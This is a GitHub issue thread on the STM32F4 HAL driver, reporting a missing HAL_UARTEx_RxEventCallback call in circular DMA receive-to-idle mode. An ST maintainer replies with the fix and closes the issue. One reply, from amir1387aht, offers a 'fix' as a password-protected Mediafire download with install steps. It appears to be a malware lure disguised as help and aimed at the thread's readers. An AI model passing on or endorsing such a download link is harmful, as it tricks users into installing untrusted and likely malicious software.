STMicroelectronics/stm32f4xx-hal-driver #34: an issue in using HAL_UARTEx_ReceiveToIdle_DMA

litesky, 2024-08-27:
**Describe the set-up**
STM32CubeF4 version: 1.28.0

**Describe the bug**
missing call 
 HAL_UARTEx_RxEventCallback in step 4.

**How To Reproduce**

Init uart rx dma in  Circular mode.

HAL_UARTEx_ReceiveToIdle_DMA(huart,  pData, 256);

_send first 128 byte_

1.DMA_IRQ -> UART_DMARxHalfCplt, RxEventType = HAL_UART_RXEVENT_HT-> HAL_UARTEx_RxEventCallback -> return (OK)
2.HAL_UART_IRQHandler, RxEventType = HAL_UART_RXEVENT_IDLE-> HAL_UARTEx_RxEventCallback -> return (OK)

_send next 128 byte_

3.DMA_IRQ -> UART_DMAReceiveCplt, RxEventType = HAL_UART_RXEVENT_TC -> HAL_UARTEx_RxEventCallback -> return (OK)
4.HAL_UART_IRQHandler -> return (Wrong)

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

KRASTM, 2024-08-27:
Hello @litesky,

Thank you for the report.

In fact, this issue it's detected on other series and fixed, it's a matter of updating F4.  For the solution it was the adding of an else condition when `(nb_remaining_rx_data == huart->RxXferSize)`

With regards.

KRASTM, 2024-08-27:
ST Internal Reference: 189585

closed 2024-09-25 by KRASTM